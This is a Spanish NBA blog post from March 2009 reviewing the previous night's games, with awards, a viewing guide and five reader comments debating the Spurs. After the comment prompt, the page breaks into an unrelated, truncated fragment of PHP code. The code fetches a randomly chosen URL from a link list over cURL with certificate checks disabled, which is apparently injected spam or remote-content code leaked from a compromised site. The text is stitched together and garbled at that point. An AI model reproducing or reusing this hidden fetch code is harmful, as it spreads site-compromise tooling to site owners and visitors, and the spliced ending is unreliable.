La crónica (24/03/2009)

25 de March de 2009 por MagicJohnson32

Por TheDeerHunter & MagicJohnson32

Por lo que se ve, el final de temporada se está haciendo excesivamente largo para algún que otro “capo” de la liga.

A pesar de la limitada importancia que públicamente le da Popovich a la regular, llama poderosamente la atención ver a Duncan y Parker sudando la gota gorda para llevarse, de aquella manera, un partido en casa por un punto frente a los Warriors. Con la trayectoria del viejo zorro y sus Spurs uno nunca sabe hasta qué punto esa pose es real o es un farol. Por un lado, nunca han tenido problemas por dejarse llevar en algunas fases, según cómo se haya presentado el panorama… pero, por otro, los años no pasan en balde y el tute que se vienen pegando Parker & Duncan sin Ginóbili puede resultar un problema. Nadie duda de la categoría de este equipo, mucho menos habiéndole añadido piezas importantes como Mason, Hill o Gooden, pero el año pasado con muchísimos menos incidentes físicos ya tuvieron problemas al final y una segunda ronda con desventaja de campo es algo que de seguro no desea nadie en San Antonio (como pudimos comprobar ayer). Por otra parte, las cuatro derrotas en los últimos 10 partidos parecen menos si juras y perjuras que te da igual perder…

Peor lo tiene Detroit, con medio equipo lesionado y jugándose las habichuelas ni más ni menos que por asegurar su plaza de Playoffs. Anoche los Bulls, precisamente los Bulls, les ganaron con suficiencia en un partido de competencia directa por (suena muy fuerte) la séptima plaza, donde ahora mismo están empatados a victorias. Es perfectamente posible que los Pistons queden octavos, pero viendo la proyección de 6-4 que tiene Charlotte frente a la de 3-7 que tienen ellos, lo que hace muy poco parecía imposible ahora parece peligrosamente cercano.

Paralelamente a todas estas tribulaciones, en el partido destacado de ayer los Jazz le apretaron bien las tuercas a los Rockets en el Energy Solutions de Salt Lake en el que podría ser un adelanto del choque en primera ronda. No llegar a un 35% en tiro es un mal presagio para esa hipotética eliminatoria (11 de 38 entre Artest y Yao). Sigue siendo un simple partido de regular pero la sensación de agobio defensivo seguro que ha quedado impresa en la piel de los tejanos, como también los precedentes.

Por último, el gran duelo que augurábamos entre Kobe y Durant no lo fue tanto. Ambos estuvieron bastante fallones y al final todo cayó por su propio peso, el del equipo más potente. Los Lakers fueron siempre por delante y los titulares pudieron descansar. Cabe destacar la presión en toda la cancha que dispusieron los Lakers durante un buen tramo de partido y las grandes actuaciones de Josh Powell y de Walton saliendo desde el banquillo.

PREMIOS

MVP: Hizo falta una canasta salvadora de Roger Mason y un error de Monta Ellis, pero la estrella en la victoria de los Spurs sobre los Warriors fue Tony Parker. El francés anotó 30 puntos y repartió 10 asistencias ante la siempre porosa defensa de los de Nelson.

El rookie: Ante la baja de Rose, y sin partidos por parte de Mayo, Brook Lopez, Marc Gasol, Love y otros de los mejores debutantes de la hornada 2008, parecía que el premio debía recaer sobre Westbrook. El ex Bruins, sin embargo, no brilló ante los Lakers, por lo que nuestro premio al mejor rookie de la noche va para Anthony Randolph y sus 13 puntos, 9 rebotes, 5 tapones y 2 asistencias en 25 minutos.

La sorpresa: Va a dejar de ser una sorpresa la gran productividad de Will Bynum cuando dispone de minutos. Anoche, en los 34 que disputó en Chicago el ex Maccabi logró 20 puntos con 10 de 16 en tiros, 9 asistencias, 4 rebotes y 2 robos para ser el mejor de los Pistons. En el mismo partido hay que destacar el gran papel de Hinrich, titular por la ausencia de Derrick Rose y que condujo el triunfo de los Bulls con 24 puntos, 8 asistencias, 3 rebotes y 3 robos.

La decepción: En 22 minutos de juego, Corey Maggette falló 7 de sus 8 tiros de campo, fue incapaz de dar una sola asistencia y perdió 2 balones. ¿10 millones al año para esto?

El mayor esfuerzo en vano: Poco le faltó a Monta Ellis para llevar a los Warriors al triunfo en San Antonio, en lo que para los Spurs habría sido la tercera derrota en los últimos segundos de manera consecutiva. Ellis, autor de 27 puntos, 5 rebotes y 3 asistencias, falló sin embargo sus últimos cinco lanzamientos, todos en los 2:20 finales de partido, incluyendo el triple sobre la bocina que pudo dar la victoria a los de la bahía.

RAZONES PARA TRASNOCHAR

Quien esta próxima noche no encuentre motivos de sobra para trasnochar es porque no quiere. ¿Apetece un duelo entre favoritos del Este? Ahí está el Celtics @ Magic (1.00 horas GMT+1); ¿Uno de la zona alta del Oeste? Para eso hay un Nuggets @ Hornets a la misma hora; ¿O mejor una batalla interconferencias? A la medianoche, Spurs @ Hawks; ¿Optamos por la lucha por los Playoffs? A las 3.30 tenemos un apasionante Jazz @ Suns; Si lo que nos apetece es ver actuaciones descomunales, ahí estarán LeBron contra los Nets y Wade contra los Pacers. ¿Queremos morbo? Warriors @ Mavs, con Don Nelson dispuesto a complicarle a vida a su ex equipo. Y si deseamos ver en acción a alguno de los españoles, Calderón y los Raptors reciben a los Bucks a partir de las 00.00 horas. Un menú apto para todos los gustos.

Comenta

5 comentarios a esta entrada

  1. Miguel dice:
    #1

    ¿A alguien más le parece que estos Spurs estan fundidos o creéis que estan en una marcha menos como dijo Popovich?

      Citar

  2. Txusma dice:
    #2

    Yo ya no me fio de estos Spurs. Creo que a Popovich le gustaria bajar una marcha pero ya sienten el aliento en el cogote de Houston asi que mucho no puede echar el freno. Ademas la baja de Ginobili hace q Parker y Duncan no puedan relajarse.

      Citar

  3. TheDeerHunter dice:
    #3

    Yo tampoco me fío de los Spurs… pero el tute que se han dado sobre todo Parker y también Duncan es algo a lo que no están acostumbrados. Además… ya veremos cómo llega Ginobili a los playoffs, que esa es otra.
    Sin él no les doy como finalistas de conferencia y mucho menos como candidatos.

      Citar

  4. Jabho dice:
    #4

    Ya sabéis que lo mio es fe ciega. El año pasado fueron finalistas de conferencia en una temporada que se les dio muy mal en cuanto a lesiones, y que Manu llegó mal a los Po, no tuvieron rotaciones interiores porque Thomas no estuvo bien y Horry tampoco, poca rotación por fuera….

    Para este año han sumado a Mason, Gooden y Hill. Además Thomas llega mas acoplado. No han perdido nada y si Manu llega medio bien me siguenp areciendo mucho equipo. Vamos, mucho más que ninguno de su conferencia salvo los Lakers. Sinceramente sólo veo 4 candidatos al anillo, los 4 con cosas a favor y en contra y ninguno se destaca demasiado. Y los spurs están entre estos 4.

      Citar

  5. TheDeerHunter dice:
    #5

    Son indiscutiblemente un gran equipo… pero este año ha sido terrorífico en cuanto a lesiones (compara al Manu del año pasado y este) y sí han perdido a Barry y un poco a Finley y Oberto (que no son ni de lejos los del año pasado)
    El tema Thomas es cierto… pero aún estando más acoplado tampoco es el Thomas que todos recordamos en otros equipos y Gooden puede ser el Thomas del año pasado.

    Eso sí, del que nos olvidamos es de Bonner y que está haciendo un temporadón acojonante. Un gritón de veces mejor que el Horry del año pasado, por decir algo.

    En cualquier caso de acuerdo con tus 4 candidatos aunque tampoco me parece justo que descartemos a Orlando. Eso sí… el caso hipotético de una segunda ronda con desventaja campo para Spurs me parecería una noticia cojonuda para Lakers.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>